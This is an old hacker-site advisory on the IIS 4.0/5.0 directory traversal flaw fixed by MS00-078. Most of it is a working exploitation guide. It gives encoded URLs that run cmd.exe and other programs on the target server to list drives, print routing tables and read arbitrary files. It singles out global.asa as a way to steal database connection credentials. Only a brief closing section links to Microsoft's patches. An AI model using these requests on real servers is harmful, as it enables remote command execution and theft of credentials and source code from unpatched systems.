|
Products Affected: Internet Information Services (IIS) 4.0
& 5.0
OS: Windows NT Windows 2000
Description:
Run commands remotely on IIS
This article describe the "Web Server Folder Traversal"
security vulnerability in Internet Information Server (IIS).
Advisory:
By simply passing a url to a machine that is exploitable
you can run any command directly on the remote machine.
Remember this is for EDUCATIONAL USE ONLY and should only be
run on your own machine.
For example:
First you can list all the files in a directory by using
this: (Change localhost with the domainname of the server)
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+dir+C:
you can view any file on the system by changing the "C:" to
any directory for example c:\inetpub
Now for more advanced users you can run commands by using:
http://localhost/scripts/..%c1%9c../winnt/system32/route.exe?PRINT
This example will print a copy of the routing table
directly to your browser. You can run any exe that will give
output from this line such as netstat, ipconfig, tftp, etc.
Now lets say you find something interesting on the machines
harddrive - for example if someone is a crappy ASP
programmer they will use the global.asa to hold all the
database connection info. Now if your curious enough and
your familiar with IIS you know where to find this at - i'm
not going to hold your hand.
To view files of interest you would simply use this url:
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+type+C:\inetpub\wwwroot\directory\global.asa
This will 'type' the files contents to your browser - in
other words you can view all the source code instead of
executing it on the server.
Fix:
Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862
Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/Security/Bulletin/ms00-078.asp
Credits:
rOOtless@astalavista.com ->Core Member |